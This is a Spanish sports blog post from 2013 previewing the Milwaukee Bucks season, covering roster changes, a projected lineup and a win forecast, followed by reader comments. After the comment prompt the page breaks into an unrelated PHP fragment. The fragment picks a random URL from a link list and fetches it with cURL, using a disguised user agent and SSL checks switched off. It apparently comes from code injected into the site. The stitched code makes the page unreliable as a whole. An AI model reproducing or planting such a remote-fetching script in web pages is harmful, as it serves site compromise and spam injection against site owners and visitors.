Milwaukee Bucks: La caza del cervatillo

15 de October de 2013 por TheDeerHunter

No se puede decir que los Bucks hayan estado quietos este verano. 11 altas y otras tantas bajas, más que ningún otro equipo de la liga. Sorprende la revolución en la franquicia del ciervo. Primero porque acumulan varias temporadas de mucha inestabilidad deportiva y segundo, porque la temporada pasada no fue particularmente mala como para volver a resetear el proyecto. El término “resetear” se queda incluso algo corto pues la plantilla ha sufrido un desmantelamiento casi completo, sobre todo en las posiciones de perímetro. Quizá John Hammond ha adaptado aquello de “Fear the deer” a su propia persona o es que a Larry Drew no le valía casi nada de lo heredado.

Nos pilló desprevenidos la salida de Brandon Jennings, el último acierto de la franquicia en la lotería. Es cierto que “el hombre que ganaba a Ricky con una mano atada a la espalda” llevaba bastante tiempo un tanto estancado, especialmente en el tiro, pero los Bucks no andan sobrados en el mercado de FA’s como para desechar determinados perfiles de jugador. Desconocemos si el nuevo Brandon (Knight) hará olvidar al otro fácilmente. Lo que sí hará es cobrar menos. La posición de base estará razonablemente bien cubierta con la aportación de Luke Ridnour, que vuelve a casa. Veremos si da para que el rookie Nate Wolters disfrute de algunos minutos. 

Sí se veía venir la salida de Monta Ellis. Suponemos que tenía tantas ganas de largarse como las que empezó a sentir O.J. Mayo tras enterarse de la noticia. La verdad es que Ellis y Mayo son un poco tal para cual para según qué cosas pero la franquicia acierta con el movimiento sustituyendo un jugador que sí o sí perdían por una buena opción como Mayo, tras su más que correcta temporada pasada. Otro ilustre como Mike Dunleavy también salió disparado en dirección Chicago, como Reddick (recordemos que llegó a cambio de Tobias Harris) Nuevamente los Bucks se han movido bien con la adquisición de Gary Neal y la elección en el draft de Giannis Antetokounmpo que ha dejado algunas sensaciones interesantes en la pretemporada.

En el resumen de la pasada campaña advertíamos que el único alero en nómina que quedaba era Mbah a Moute.  Poco después terminaba siendo el único jugador de perímetro del equipo y al final ni siquiera eso. Repasábamos una amplia nómina de futuribles sin ningún acierto. Finalmente los que llegan suenan tan “apasionantes” como los que mencionábamos: Caron Butler, Carlos Delfino y un Khris Middleton incluido como relleno del “Brandon por Brandon”. No es precisamente la mejor línea de 3 del campeonato.

Lo que sí ha respetado la guillotina es la línea interior, notándose tan sólo un lógico rejuvenecimiento con las salidas hasta cierto punto lógicas de Gooden, Przybilla y Dalembert. Continúan Ersan Illyasova, John Henson y Epke Udoh, los 3 power forwards que terminaron el curso, y también el pívot Larry Sanders, que es lo más parecido que tienen a un jugador franquicia. Nos hicieron caso y ficharon a Zaza Pachulia, junto al serbio Miroslav Raduljica. Un interesante juego interior que no dudamos lo va a hacer bien.

Así el equipo queda austero (sólo los Sixers mantienen un total salarial inferior) y cumplidor pero no será suficiente para hacer frente a una mayoría de plantillas a priori más potentes. No es el infierno del Oeste pero la conferencia tampoco será tan asequible como otros años. Lo más lógico es que terminen tanqueando antes o después y busquen la suerte de la lotería. Lo que verdaderamente se echa en falta es una línea de trabajo que se palpe. A ver si empezamos a vislumbrarla a partir del año que viene.

Quinteto inicial: Brandon Knight, O.J. Mayo, Caron Butler, Ersan Ilyasova, Larry Sanders.
6º hombre: John Henson

Altas: Giannis Antetokounmpo (N), Caron Butler (LAC), Carlos Delfino (HOU), Brandon Knight (DET), O.J. Mayo (DAL), Khris Middleton (DET), Gary Neal (SAS), Zaza Pachulia (ATL), Miroslav Raduljica (N), Luke Ridnour (MIN), Nate Wolters (N).

Bajas: Gustavo Ayón (ATL), Samuel Dalembert (DAL), Marquis Daniels, Mike Dunleavy (CHI), Monta Ellis (DAL), Drew Gooden, Brandon Jennings (DET), Luc Mbah a Moute (SAC), Joel Przybilla, J.J. Redick (LAC), Ish Smith (PHO).

Pronóstico: 30 victorias con dificultad. Últimos de la Central.

Comenta

8 comentarios a esta entrada

  1. Esteban dice:
    #1

    es descvoncertante este equipo, relllenisimo de jugadores de medio pelo como delfino, butler, mayo, neal, ridnour, pachulia, knight etc, dificil armar un equipo con semejante loteria de jugadores

    hubiese sido preferebile que gastaran en dinero en al jefferson y construir poco o mucho al rededor de el

    yo creo o creia mas alla de los juegos de pretemporada que dandole la oporunidad a gary neal este daria un salto de calidad, y promediaria por encima de los 20 putnos, solo necesita minutosde juego y tiros
    pero al parecer seguira saliendo de la banca y los partidos de pretemporada no ha demostrado nada

      Citar

  2. Jose Luis dice:
    #2

    Los Bucks son de esos equipos de que deben decidirse ya en lo que quieren. No sé si les compensa económicamente estar siempre entre el 7 y el 10.

      Citar

  3. Esteban dice:
    #3

    he leido por ahi que los bucks luchan todos los años por entrar a PO, por que dado el mercado que es, una mala temporada sin gente en el estadio ya se hablara de mudar la franquicia

    por eso supùestamente nunca inician una reconstruccion profunda

      Citar

  4. Denise dice:
    #4

    Agradezco a los Bucks que no hagan tanking descarado e intenten conseguir jugadores decentes que les lleve los mas arriba posible con las dificultades que el mercado les impone. Pero pensandolo friamente, no es lo mejor.
    El año que viene van a conseguir en el Draft un gran jugador, porque en el Este solo los veo superiores a los 76ers, pero el equipo queda bastante hipotecado.
    Mayo y Pachulia sobrepagados, Delfino con un contrato muy largo para los años que tiene, y por Jennings podrían haber sacado mucho más de lo que sacaron.

      Citar

  5. Jose Luis dice:
    #5

    32 millones los internos de los Bucks el año proximo…

    7.9 Ilyasova
    5.2 Pachulia
    11 Sanders
    2 Henson
    6 Udoh

    Pos vale… pf

    Le sobra Udoh, espero que no le hagan qualifying y se vaya a la porra xddd

      Citar

  6. Heineken dice:
    #6

    Antetokounmpo for ROY!!!

      Citar

  7. Jose Luis dice:
    #7

    The Alphabet!!

      Citar

  8. GreenPride dice:
    #8

    Buff desmantelamiento total del equipo perdiendo sus mejores jugadores y sustituyéndolos por gente con la mitad de talento en el mejor de los casos. Temporada perdida por los Bucks (quien dijo tanking y Wiggings?).

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>